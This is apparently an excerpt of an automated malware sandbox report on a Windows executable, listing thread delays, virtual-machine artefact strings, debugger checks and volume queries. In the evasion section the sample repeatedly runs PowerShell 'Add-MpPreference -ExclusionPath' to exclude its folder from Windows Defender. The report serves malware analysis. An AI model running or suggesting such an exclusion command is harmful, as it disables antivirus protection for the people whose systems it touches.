Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 99844	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 99726	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 99609	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 99500	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 99389	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 99281	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 99172	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 99063	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 98953	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 98844	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599937	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599828	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599717	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599609	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599500	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599389	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599281	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599172	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599062	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598953	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598843	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598515	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598296	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598187	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598056	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 597934	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 597813	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 594584	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 100000
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 99854
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 99735
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 99610
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 99469
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 99359
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 99249
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 99141
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 99020
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599984
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599874
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599765
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599656
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599525
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599421
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599311
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599202
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 599093
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598984
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598874
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598765
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598640
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598524
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598415
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598311
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598203
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 598093
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 597982
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 597870
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 597765
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 597656
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 597542
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 597432
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 597328
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 597208
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 597078
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 596968
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 596857
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 596749
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 596640
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 596515
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 596405
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 596296
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 596181
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 596077
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 595968
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 595857
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 595749
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 595640
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Thread delayed: delay time: 595530
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: Amcache.hve.7.dr	Binary or memory string: VMware
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.7.dr	Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
Source: Amcache.hve.7.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: 9K25QyJ4hA.exe, 00000000.00000002.1462664887.0000000000803000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
Source: Amcache.hve.7.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.7.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: 9K25QyJ4hA.exe, 00000009.00000002.1534961596.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1841459931.0000000001268000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.7.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.7.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.7.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.7.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.7.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.7.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process queried: DebugPort
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\9K25QyJ4hA.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop

Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop

Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Queries volume information: C:\Users\user\Desktop\9K25QyJ4hA.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Queries volume information: C:\Users\user\Desktop\9K25QyJ4hA.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe	Queries volume information: C:\Users\user\Desktop\9K25QyJ4hA.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
